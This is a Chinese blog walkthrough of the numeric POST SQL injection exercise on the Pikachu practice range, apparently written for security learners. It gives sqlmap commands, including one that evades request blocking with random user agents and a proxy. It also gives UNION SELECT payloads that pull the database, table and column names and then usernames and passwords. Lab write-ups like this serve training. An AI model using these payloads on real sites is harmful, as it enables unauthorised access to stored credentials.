pikachu靶场——SQL-Inject—1(Kali系统)

文章目录

由于时间关系,今天使用 union 查询方式复现 数字型注入(post)的案例。本文仅用于合法授权的渗透测试场景,旨在帮助开发者识别sql注入漏洞、提升Web应用安全性,严禁用于未授权攻击!网络安全无小事,违规操作将承担相应法律责任。

(一)数字型注入(post)

使用 sqlmap 语句对网站地址是否存在 sql 注入的漏洞进行检测,具体命令:

sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_id.php' --data='id=1&submit=%E6%9F%A5%E8%AF%A2' --batch

如果 sqlmap 语句显示下面的信息,表述目标网站拒绝了 sqlmap 发起的请求,

这是将 sqlmap 的命令改为如下,主要变动是添加了请求代理(proxy)和随机生成请求头

sqlmap -u 'http://192.168.0.20/pikachu/vul/sqli/sqli_id.php' --data='id=1&submit=%E6%9F%A5%E8%AF%A2'--random-agent --proxy='http://127.0.0.1:8080' --batch

具体结果如图:

sqlmap 检测到http://192.168.0.20/pikachu/vul/sqli/sqli_id.php地址存在三个sql漏洞,分别为 布尔盲注漏洞(boolen-based blind)、报错注入(error-based)、时间盲注(time-based blind)、联合查询注入(union query)

(二)漏洞的利用

这里使用联合查询注入(union query)的方式来实施注入。通过注入,获取数据库的相关信息。通过 bp 获取查询的数据包。并将数据包发送到 Repeater 中。

1.获取数据库名称

在 id 处 拼接 union select database(),''的 sql 语句,发送后,会返回两条信息,其中 pikachu 就是当前数据库的名称。这里加 '' 的原因是通过sqlmap 扫描,查询的数据返回的是2列的数据,要保证返回数据数量的一致。

2.获取数据库中表的名称

在 id 处拼接union select (SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.TABLES t WHERE t.TABLE_SCHEMA='pikachu'),''的 sql 语句,发送后,会返回两条信息,其中相同位置显示的就是pikachu数据库中表的信息。

3.获取表中的字段名称

在 id 处拼接 union SELECT (select GROUP_CONCAT(c.COLUMN_NAME) from information_schema.COLUMNS c where c.TABLE_SCHEMA='pikachu' and c.TABLE_NAME='users'),''

4.获取表中指定字段的具体数据

在 id 处拼接 union select username,password from users where '1' ='1',这里需要注意的是查询的字段个数要与返回的个数相同。

相关推荐
河阿里3 小时前
SQL数据库:五大范式(NF)
数据库·sql·oracle
zjeweler7 小时前
万字长文解析:构建从域名发现到框架识别的信息收集
网络安全·渗透测试·信息收集
Irene19917 小时前
SQL 中日期的特殊性总结(格式符严格要求全大写)
sql
花椒技术8 小时前
从区间锁到行锁:一次高并发写入死锁治理实战
后端·sql
派拉软件13 小时前
从 IAM 到 AAM,重构 AI Agent 时代的访问控制体系
大数据·人工智能·网络安全·重构·iam·身份与访问控制·aam
天山@12313 小时前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
你觉得脆皮鸡好吃吗14 小时前
SQL注入 高权限注入(引入概念)
网络·数据库·sql·oracle·网络安全学习
untE EADO15 小时前
MySQL错误-this is incompatible with sql_mode=only_full_group_by完美解决方案
android·sql·mysql
Irene199115 小时前
(课堂笔记)SQL基础语法分类总结表
数据库·sql